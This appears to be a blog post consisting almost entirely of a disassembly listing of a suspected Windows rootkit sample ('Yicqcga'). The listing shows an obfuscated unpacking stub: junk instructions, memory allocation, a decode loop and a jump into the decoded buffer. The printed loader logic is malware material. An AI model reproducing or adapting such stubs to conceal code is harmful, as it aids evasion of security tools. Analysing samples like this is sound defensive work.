:0040168F C1E00E shl eax, 0E

:00401692 80E4D0 and ah, -30

:00401695 33C1 xor eax, ecx

:00401697 C1E811 shr eax, 11

:0040169A 662BC9 sub cx, cx

:0040169D 33C8 xor ecx, eax

:0040169F 66B90E00 mov cx, 000E

:004016A3 66874DF4 xchg word[ebp-0C], cx

:004016A7 662BC8 sub cx, ax

:004016AA 2BC8 sub ecx, eax

:004016AC C745EC00000000 mov dword[ebp-14], 00000000

:004016B3 6A23 push 023

:004016B5 5A pop edx

:004016B6 83C21D add edx, 01D

:004016B9 52 push edx

:004016BA 688C0D0000 push 00000D8C

:004016BF 59 pop ecx

:004016C0 81C174020000 add ecx, 00000274

:004016C6 51 push ecx

:004016C7 6852BEFBFF push FFFBBE52

:004016CC 5B pop ebx

:004016CD F7DB neg ebx

:004016CF 53 push ebx

:004016D0 33C0 xor eax, eax

:004016D2 50 push eax

:004016D3 FF1524214000 call dword[00402124 ->00002564 VirtualAlloc]

;;call KERNEL32.VirtualAlloc

:004016D9 8945EC mov dword[ebp-14], eax

:004016DC C0E515 shl ch, 15

:004016DF 6681E9CC00 sub cx, 00CC

:004016E4 C1E00A shl eax, 0A

:004016E7 66B95CBB mov cx, BB5C

:004016EB 66874D12 xchg word[ebp+12], cx

:004016EF 8B75EC mov esi, dword[ebp-14]

:004016F2 8B5DE8 mov ebx, dword[ebp-18]

:004016F5 8BD6 mov edx, esi

:004016F7 2BDE sub ebx, esi

:004016F9 BFAE410400 mov edi, 000441AE

———

:004016FE C1E103 shl ecx, 03

:00401701 C1E016 shl eax, 16

:00401704 66C1E10A shl cx, 0A

:00401708 23C9 and ecx, ecx

:0040170A 8A0C13 mov cl, byte[ebx+edx]

:0040170D 880A mov byte[edx], cl

:0040170F 66B88600 mov ax, 0086

:00401713 668745F6 xchg word[ebp-0A], ax

:00401717 662BC9 sub cx, cx

:0040171A C1E806 shr eax, 06

:0040171D B188 mov cl, -78

:0040171F 864D13 xchg byte[ebp+13], cl

:00401722 66B9E200 mov cx, 00E2

:00401726 66874DF4 xchg word[ebp-0C], cx

:0040172A 42 inc edx

:0040172B 4F dec edi

:0040172C 75D0 jne 004016FE

:0040172E 8975E8 mov dword[ebp-18], esi

:00401731 C1E114 shl ecx, 14

:00401734 33C8 xor ecx, eax

:00401736 34B0 xor al, -50

:00401738 33C1 xor eax, ecx

:0040173A B386 mov bl, -7A

:0040173C 865D13 xchg byte[ebp+13], bl

:0040173F C745F800000000 mov dword[ebp-08], 00000000

:00401746 C745E09E000000 mov dword[ebp-20], 0000009E

:0040174D 662BC8 sub cx, ax

:00401750 66352E00 xor ax, 002E

:00401754 80F1FA xor cl, -06

:00401757 662BC0 sub ax, ax

:0040175A C1E115 shl ecx, 15

:0040175D 80E928 sub cl, 28

:00401760 6633C9 xor cx, cx

:00401763 FECA dec dl

:00401765 C0E40A shl ah, 0A

:00401768 6633C8 xor cx, ax

:0040176B 23C0 and eax, eax

:0040176D C0E517 shl ch, 17

:00401770 C1E11A shl ecx, 1A

:00401773 80E9D2 sub cl, -2E

:00401776 2C04 sub al, 04

:00401778 66C1E11C shl cx, 1C

:0040177C 6681F1E4D1 xor cx, D1E4

:00401781 80E9FE sub cl, -02

:00401784 66C1E01C shl ax, 1C

:00401788 66C1E011 shl ax, 11

:0040178C 6603C9 add cx, cx

:0040178F 66C1E102 shl cx, 02

:00401793 6649 dec cx

:00401795 B100 mov cl, 00

:00401797 864DFF xchg byte[ebp-01], cl

:0040179A C1E11E shl ecx, 1E

:0040179D 662BC1 sub ax, cx

:004017A0 B39E mov bl, -62

:004017A2 865DFE xchg byte[ebp-02], bl

:004017A5 33C1 xor eax, ecx

:004017A7 6683F160 xor cx, 060

:004017AB 664B dec bx

:004017AD 6683F11C xor cx, 01C

:004017B1 2BC8 sub ecx, eax

:004017B3 C0E409 shl ah, 09

:004017B6 B0AC mov al, -54

:004017B8 864513 xchg byte[ebp+13], al

:004017BB 80E956 sub cl, 56

:004017BE 662BC8 sub cx, ax

:004017C1 C1E10F shl ecx, 0F

:004017C4 C1E814 shr eax, 14

:004017C7 80E5A6 and ch, -5A

:004017CA 6681E9D04B sub cx, 4BD0

:004017CF C74510E638FFFF mov dword[ebp+10], FFFF38E6

:004017D6 8B4510 mov eax, dword[ebp+10]

:004017D9 3D74E60000 cmp eax, 0000E674

:004017DE 7C56 jl 00401836

:004017E0 66B95400 mov cx, 0054

:004017E4 66874DF4 xchg word[ebp-0C], cx

:004017E8 6633C0 xor ax, ax

:004017EB 33C9 xor ecx, ecx

:004017ED B0DA mov al, -26

:004017EF 864513 xchg byte[ebp+13], al

:004017F2 8B7D10 mov edi, dword[ebp+10]

———

:004017F5 2BC0 sub eax, eax

:004017F7 66C1E103 shl cx, 03

:004017FB 2C06 sub al, 06

:004017FD 2C04 sub al, 04

:004017FF 3400 xor al, 00

:00401801 6681F12AEB xor cx, EB2A

:00401806 6681F12657 xor cx, 5726

:0040180B 66C1E90D shr cx, 0D

:0040180F 6633C0 xor ax, ax

:00401812 6633C8 xor cx, ax

:00401815 B100 mov cl, 00

:00401817 864D13 xchg byte[ebp+13], cl

:0040181A C0E403 shl ah, 03

:0040181D 8B4DF0 mov ecx, dword[ebp-10]

:00401820 41 inc ecx

:00401821 894DF0 mov dword[ebp-10], ecx

:00401824 C1E90F shr ecx, 0F

:00401827 66C1E802 shr ax, 02

:0040182B 80E45A and ah, 5A

:0040182E C1E10B shl ecx, 0B

:00401831 C1E109 shl ecx, 09

:00401834 EB03 jmp 00401839

———

:00401836 8B7D10 mov edi, dword[ebp+10]

———

:00401839 66C1E905 shr cx, 05

:0040183D 23C0 and eax, eax

:0040183F 80E5E6 and ch, -1A

:00401842 6633C9 xor cx, cx

:00401845 6A2A push 02A

:00401847 8F45E4 pop dword[ebp-1C]

:0040184A 8145E4C1090000 add dword[ebp-1C], 000009C1

:00401851 8B55E4 mov edx, dword[ebp-1C]

:00401854 8B45F0 mov eax, dword[ebp-10]

:00401857 3BC2 cmp eax, edx

:00401859 0F84B9010000 je 00401A18

:0040185F 23C8 and ecx, eax

:00401861 6635527E xor ax, 7E52

:00401865 B19C mov cl, -64

:00401867 864DFE xchg byte[ebp-02], cl

:0040186A 662BC0 sub ax, ax

:0040186D 6633C0 xor ax, ax

:00401870 C1E806 shr eax, 06

:00401873 C0E412 shl ah, 12

:00401876 80F10E xor cl, 0E

:00401879 34CE xor al, -32

:0040187B 2C64 sub al, 64

:0040187D C1E913 shr ecx, 13

:00401880 8B45F0 mov eax, dword[ebp-10]

:00401883 C1E002 shl eax, 02

:00401886 0345E8 add eax, dword[ebp-18]

:00401889 8945DC mov dword[ebp-24], eax

:0040188C 6635D4B7 xor ax, B7D4

:00401890 66B90000 mov cx, 0000

:00401894 66874DF4 xchg word[ebp-0C], cx

:00401898 C1E01E shl eax, 1E

:0040189B 80F176 xor cl, 76

:0040189E 8B45DC mov eax, dword[ebp-24]

:004018A1 8B00 mov eax, dword[eax]

:004018A3 8945EC mov dword[ebp-14], eax

:004018A6 6681E9DC00 sub cx, 00DC

:004018AB 663502B2 xor ax, B202

:004018AF 6649 dec cx

:004018B1 662DE200 sub ax, 00E2

:004018B5 C0E51C shl ch, 1C

:004018B8 80E90C sub cl, 0C

:004018BB 6633C8 xor cx, ax

:004018BE 2C6A sub al, 6A

:004018C0 66C1E81D shr ax, 1D

:004018C4 6603C9 add cx, cx

:004018C7 C1E106 shl ecx, 06

:004018CA 2BC9 sub ecx, ecx

:004018CC 80E9C4 sub cl, -3C

:004018CF 8B45F8 mov eax, dword[ebp-08]

:004018D2 8B75EC mov esi, dword[ebp-14]

:004018D5 C1EE1D shr esi, 1D

:004018D8 8B4DEC mov ecx, dword[ebp-14]

:004018DB C1E103 shl ecx, 03

:004018DE 0BF1 or esi, ecx

:004018E0 8B45F8 mov eax, dword[ebp-08]

:004018E3 85C0 test eax, eax

:004018E5 B8E0000000 mov eax, 000000E0

:004018EA 7403 je 004018EF

:004018EC 8B45D8 mov eax, dword[ebp-28]

———

:004018EF 50 push eax

:004018F0 E89BF7FFFF call 00401090

:004018F5 83C404 add esp, 004

:004018F8 03C6 add eax, esi

:004018FA 8B4DF8 mov ecx, dword[ebp-08]

:004018FD 85C9 test ecx, ecx

:004018FF B9C6000000 mov ecx, 000000C6

:00401904 7403 je 00401909

:00401906 8B4DD4 mov ecx, dword[ebp-2C]

———

:00401909 894DD8 mov dword[ebp-28], ecx

:0040190C 8B4DF8 mov ecx, dword[ebp-08]

:0040190F 85C9 test ecx, ecx

:00401911 B966000000 mov ecx, 00000066

:00401916 7403 je 0040191B

:00401918 8B4DD0 mov ecx, dword[ebp-30]

———

:0040191B 894DD4 mov dword[ebp-2C], ecx

:0040191E 83C002 add eax, 002

:00401921 8B4DF8 mov ecx, dword[ebp-08]

:00401924 85C9 test ecx, ecx

:00401926 B9F0000000 mov ecx, 000000F0

:0040192B 7403 je 00401930

:0040192D 8B4DCC mov ecx, dword[ebp-34]

———

:00401930 8BF0 mov esi, eax

:00401932 894DD0 mov dword[ebp-30], ecx

:00401935 C1EE15 shr esi, 15

:00401938 C1E00B shl eax, 0B

:0040193B 0BF0 or esi, eax

:0040193D 8B45F8 mov eax, dword[ebp-08]

:00401940 85C0 test eax, eax

:00401942 B848000000 mov eax, 00000048

:00401947 7403 je 0040194C

:00401949 8B45C8 mov eax, dword[ebp-38]

———

:0040194C 50 push eax

:0040194D 8945CC mov dword[ebp-34], eax

:00401950 E86BF7FFFF call 004010C0

:00401955 83C404 add esp, 004

:00401958 03C6 add eax, esi

:0040195A 8B4DE0 mov ecx, dword[ebp-20]

:0040195D 85C9 test ecx, ecx

:0040195F B9B0000000 mov ecx, 000000B0

:00401964 7503 jne 00401969

:00401966 8B4DC4 mov ecx, dword[ebp-3C]

———

:00401969 8BF0 mov esi, eax

:0040196B 894DC8 mov dword[ebp-38], ecx

:0040196E C1E61F shl esi, 1F

:00401971 D1E8 shr eax, 1

:00401973 0BF0 or esi, eax

:00401975 8B45F8 mov eax, dword[ebp-08]

:00401978 85C0 test eax, eax

:0040197A 7505 jne 00401981

:0040197C BF7C000000 mov edi, 0000007C

———

:00401981 57 push edi

:00401982 897DC4 mov dword[ebp-3C], edi

:00401985 E886F7FFFF call 00401110

:0040198A 83C404 add esp, 004

:0040198D 03C6 add eax, esi

:0040198F 8B7DEC mov edi, dword[ebp-14]

:00401992 C745F8AC000000 mov dword[ebp-08], 000000AC

:00401999 C745E000000000 mov dword[ebp-20], 00000000

:004019A0 8945EC mov dword[ebp-14], eax

:004019A3 66C1E110 shl cx, 10

:004019A7 66B98A89 mov cx, 898A

:004019AB 66874DF6 xchg word[ebp-0A], cx

:004019AF 6635E8FF xor ax, FFE8

:004019B3 6633C8 xor cx, ax

:004019B6 B2CA mov dl, -36

:004019B8 8655FD xchg byte[ebp-03], dl

:004019BB 34B4 xor al, -4C

:004019BD B224 mov dl, 24

:004019BF 8655FF xchg byte[ebp-01], dl

:004019C2 2BC0 sub eax, eax

:004019C4 66354CCD xor ax, CD4C

:004019C8 2CD2 sub al, -2E

:004019CA 8B45EC mov eax, dword[ebp-14]

:004019CD 8B4DDC mov ecx, dword[ebp-24]

:004019D0 8901 mov dword[ecx], eax

:004019D2 80F190 xor cl, -70

:004019D5 66C1E01F shl ax, 1F

:004019D9 C1E802 shr eax, 02

:004019DC 2BC8 sub ecx, eax

:004019DE 3400 xor al, 00

:004019E0 664B dec bx

:004019E2 C1E01C shl eax, 1C

:004019E5 662BC1 sub ax, cx

:004019E8 C745C0BFF50000 mov dword[ebp-40], 0000F5BF

:004019EF 8B45C0 mov eax, dword[ebp-40]

:004019F2 85C0 test eax, eax

:004019F4 0F85FBFDFFFF jne 004017F5

:004019FA 6683F13A xor cx, 03A

:004019FE C1E007 shl eax, 07

:00401A01 B312 mov bl, 12

:00401A03 865D13 xchg byte[ebp+13], bl

:00401A06 66B9A264 mov cx, 64A2

:00401A0A 66874DF6 xchg word[ebp-0A], cx

:00401A0E 66B822CA mov ax, CA22

:00401A12 668745F4 xchg word[ebp-0C], ax

:00401A16 33C0 xor eax, eax

———

:00401A18 6633C8 xor cx, ax

:00401A1B 2C7E sub al, 7E

:00401A1D 23C0 and eax, eax

:00401A1F 33C0 xor eax, eax

:00401A21 80E400 and ah, 00

:00401A24 33C8 xor ecx, eax

:00401A26 662DE000 sub ax, 00E0

:00401A2A C1E904 shr ecx, 04

:00401A2D 23C8 and ecx, eax

:00401A2F 66C1E017 shl ax, 17

:00401A33 6603C9 add cx, cx

:00401A36 662D0E19 sub ax, 190E

:00401A3A 6649 dec cx

:00401A3C B900010000 mov ecx, 00000100

:00401A41 C1E102 shl ecx, 02

:00401A44 034DE8 add ecx, dword[ebp-18]

:00401A47 6A14 push 014

:00401A49 58 pop eax

:00401A4A 83C004 add eax, 004

:00401A4D 03C8 add ecx, eax

:00401A4F 894DC0 mov dword[ebp-40], ecx

:00401A52 23C8 and ecx, eax

:00401A54 2BC8 sub ecx, eax

:00401A56 66C1E11F shl cx, 1F

:00401A5A 66C1E90D shr cx, 0D

:00401A5E B154 mov cl, 54

:00401A60 864D13 xchg byte[ebp+13], cl

:00401A63 FF75E8 push dword[ebp-18]

:00401A66 FF75C0 push dword[ebp-40]

:00401A69 58 pop eax

:00401A6A FFD0 call eax

:00401A6C 34FC xor al, -04

:00401A6E 80E5A2 and ch, -5E

:00401A71 C1E10F shl ecx, 0F

:00401A74 23C1 and eax, ecx

:00401A76 33C8 xor ecx, eax

:00401A78 C1E91E shr ecx, 1E

:00401A7B 6681F1D6BB xor cx, BBD6

:00401A80 C1E903 shr ecx, 03

:00401A83 33C9 xor ecx, ecx

———

:00401A85 80E920 sub cl, 20

:00401A88 C1E117 shl ecx, 17

:00401A8B C0E41A shl ah, 1A

:00401A8E C1E814 shr eax, 14

:00401A91 66C1E00B shl ax, 0B

:00401A95 FECB dec bl

:00401A97 6635547A xor ax, 7A54

:00401A9B 6683E970 sub cx, 070

:00401A9F 5F pop edi

:00401AA0 5E pop esi

:00401AA1 33C0 xor eax, eax

:00401AA3 5B pop ebx

:00401AA4 8BE5 mov esp, ebp

:00401AA6 5D pop ebp

:00401AA7 C21000 ret 0010

:00401AAA 90 90 90 90 90 90 ……

//******************** Program Entry Point ********

:00401AB0 55 push ebp

:00401AB1 8BEC mov ebp, esp

:00401AB3 6AFF push -001

:00401AB5 6840224000 push 00402240

:00401ABA 68301C4000 push 00401C30

:00401ABF 64A100000000 mov eax, dword fs:[00000000]

:00401AC5 50 push eax

:00401AC6 64892500000000 mov dword fs:[00000000], esp

:00401ACD 83EC68 sub esp, 068

:00401AD0 53 push ebx

:00401AD1 56 push esi

:00401AD2 57 push edi

:00401AD3 8965E8 mov dword[ebp-18], esp

:00401AD6 33DB xor ebx, ebx

:00401AD8 895DFC mov dword[ebp-04], ebx

:00401ADB 6A02 push 002

:00401ADD FF1530214000 call dword[00402130 ->00002E90 __set_app_type]

;;call MSVCRT.__set_app_type

:00401AE3 59 pop ecx

:00401AE4 830D80D44400FF or dword[0044D480], -001

:00401AEB 830D84D44400FF or dword[0044D484], -001

:00401AF2 FF1534214000 call dword[00402134 ->00002E82 __p__fmode]

;;call MSVCRT.__p__fmode

:00401AF8 8B0D7CD44400 mov ecx, dword[0044D47C]

:00401AFE 8908 mov dword[eax], ecx

:00401B00 FF1538214000 call dword[00402138 ->00002E72 __p__commode]

;;call MSVCRT.__p__commode

:00401B06 8B0D78D44400 mov ecx, dword[0044D478]

:00401B0C 8908 mov dword[eax], ecx

:00401B0E A13C214000 mov eax, dword[0040213C] ->00002E62 _adjust_fdiv

:00401B13 8B00 mov eax, dword[eax]

:00401B15 A388D44400 mov dword[0044D488], eax

:00401B1A E810010000 call 00401C2F

:00401B1F 391D6CD44400 cmp dword[0044D46C], ebx

:00401B25 750C jne 00401B33

:00401B27 682C1C4000 push 00401C2C

:00401B2C FF1540214000 call dword[00402140 ->00002E4E __setusermatherr]

;;call MSVCRT.__setusermatherr

:00401B32 59 pop ecx

———

:00401B33 E8E2000000 call 00401C1A

:00401B38 680C304000 push 0040300C

:00401B3D 6808304000 push 00403008

:00401B42 E8CD000000 call 00401C14

;;call MSVCRT._initterm

:00401B47 A174D44400 mov eax, dword[0044D474]

:00401B4C 894594 mov dword[ebp-6C], eax

:00401B4F 8D4594 lea eax, dword[ebp-6C]

:00401B52 50 push eax

:00401B53 FF3570D44400 push dword[0044D470]

:00401B59 8D459C lea eax, dword[ebp-64]

:00401B5C 50 push eax

:00401B5D 8D4590 lea eax, dword[ebp-70]

:00401B60 50 push eax

:00401B61 8D45A0 lea eax, dword[ebp-60]

:00401B64 50 push eax

:00401B65 FF1548214000 call dword[00402148 ->00002E32 __getmainargs]

;;call MSVCRT.__getmainargs

:00401B6B 6804304000 push 00403004

:00401B70 6800304000 push 00403000

:00401B75 E89A000000 call 00401C14

;;call MSVCRT._initterm

:00401B7A 83C424 add esp, 024

:00401B7D A14C214000 mov eax, dword[0040214C] ->00002E28 _acmdln

:00401B82 8B30 mov esi, dword[eax]

:00401B84 89758C mov dword[ebp-74], esi

:00401B87 803E22 cmp byte[esi], 22

:00401B8A 753A jne 00401BC6

———

:00401B8C 46 inc esi

:00401B8D 89758C mov dword[ebp-74], esi

:00401B90 8A06 mov al, byte[esi]

:00401B92 3AC3 cmp al, bl

:00401B94 7404 je 00401B9A

:00401B96 3C22 cmp al, 22

:00401B98 75F2 jne 00401B8C

———

:00401B9A 803E22 cmp byte[esi], 22

:00401B9D 7504 jne 00401BA3

———

:00401B9F 46 inc esi

:00401BA0 89758C mov dword[ebp-74], esi

———

:00401BA3 8A06 mov al, byte[esi]

:00401BA5 3AC3 cmp al, bl

:00401BA7 7404 je 00401BAD

:00401BA9 3C20 cmp al, 20

:00401BAB 76F2 jbe 00401B9F

———

:00401BAD 895DD0 mov dword[ebp-30], ebx

:00401BB0 8D45A4 lea eax, dword[ebp-5C]

:00401BB3 50 push eax

:00401BB4 FF151C214000 call dword[0040211C ->00002ED0 GetStartupInfoA]

;;call KERNEL32.GetStartupInfoA

:00401BBA F645D001 test byte[ebp-30], 01

:00401BBE 7411 je 00401BD1

:00401BC0 0FB745D4 movzx eax, word[ebp-2C]

:00401BC4 EB0E jmp 00401BD4

———

:00401BC6 803E20 cmp byte[esi], 20

:00401BC9 76D8 jbe 00401BA3

:00401BCB 46 inc esi

:00401BCC 89758C mov dword[ebp-74], esi

:00401BCF EBF5 jmp 00401BC6

———

:00401BD1 6A0A push 00A

:00401BD3 58 pop eax

———

:00401BD4 50 push eax

:00401BD5 56 push esi

:00401BD6 53 push ebx

:00401BD7 53 push ebx

:00401BD8 FF15D8204000 call dword[004020D8 ->0000268C GetModuleHandleA]

;;call KERNEL32.GetModuleHandleA

:00401BDE 50 push eax

:00401BDF E86CF5FFFF call 00401150

:00401BE4 894598 mov dword[ebp-68], eax

:00401BE7 50 push eax

:00401BE8 FF1550214000 call dword[00402150 ->00002E20 exit]

;;call MSVCRT.exit

:00401BEE 8B45EC mov eax, dword[ebp-14]

:00401BF1 8B08 mov ecx, dword[eax]

:00401BF3 8B09 mov ecx, dword[ecx]

:00401BF5 894D88 mov dword[ebp-78], ecx

:00401BF8 50 push eax

:00401BF9 51 push ecx

:00401BFA E80F000000 call 00401C0E

;;call MSVCRT._XcptFilter

:00401BFF 59 pop ecx

:00401C00 59 pop ecx

:00401C01 C3 ret

:00401C02 8B65E8 mov esp, dword[ebp-18]

:00401C05 FF7588 push dword[ebp-78]

:00401C08 FF1558214000 call dword[00402158 ->00002E0A _exit]

;;call MSVCRT._exit

=========

:00401C0E FF2554214000 jmp dword[00402154 ->00002E12 _XcptFilter]

;;call MSVCRT._XcptFilter

=========

:00401C14 FF2544214000 jmp dword[00402144 ->00002E42 _initterm]

;;call MSVCRT._initterm

=========

:00401C1A 6800000300 push 00030000

:00401C1F 6800000100 push 00010000

:00401C24 E80D000000 call 00401C36

;;call MSVCRT._controlfp

:00401C29 59 pop ecx

:00401C2A 59 pop ecx

:00401C2B C3 ret

———

:00401C2C 33C0 xor eax, eax

:00401C2E C3 ret

=========

:00401C2F C3 ret

———

:00401C30 FF252C214000 jmp dword[0040212C ->00002EA2 _except_handler3]

;;call MSVCRT._except_handler3

=========

:00401C36 FF255C214000 jmp dword[0040215C ->00002EC2 _controlfp]

;;call MSVCRT._controlfp

:00401C3C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401C4C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401C5C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401C6C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401C7C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401C8C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401C9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401CAC 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401CBC 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401CCC 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401CDC 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401CEC 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401CFC 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401D0C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401D1C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401D2C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401D3C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401D4C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401D5C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401D6C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401D7C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401D8C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401D9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401DAC 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401DBC 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401DCC 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401DDC 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401DEC 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401DFC 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401E0C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401E1C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401E2C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401E3C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401E4C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401E5C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401E6C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401E7C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401E8C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401E9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401EAC 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401EBC 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401ECC 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401EDC 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401EEC 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401EFC 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401F0C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401F1C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401F2C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401F3C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401F4C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401F5C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401F6C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401F7C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401F8C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401F9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401FAC 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401FBC 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401FCC 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401FDC 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401FEC 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….

:00401FFC 00 00 00 00 ….

*************** Cross Reference Listing ****************

==00401000::00401097,

==00401010::0040109F,

==00401030::00401067,

==00401040::00401125,

==00401060::0040113A,

==00401090::004018F0,

==004010C0::00401950,

==00401110::00401985,

–004017F5::004019F4,

–00401A18::00401859,

–00401A85::00401603,

==00401C0E::00401BFA,

==00401C14::00401B42,00401B75,

==00401C1A::00401B33,

–00401C2C::00401B27,

==00401C2F::00401B1A,

–00401C30::00401ABA,

==00401C36::00401C24,

*************** END OF LISTING **********************************

huanix » rootkit

Yicqcga running as a rootkit on XP?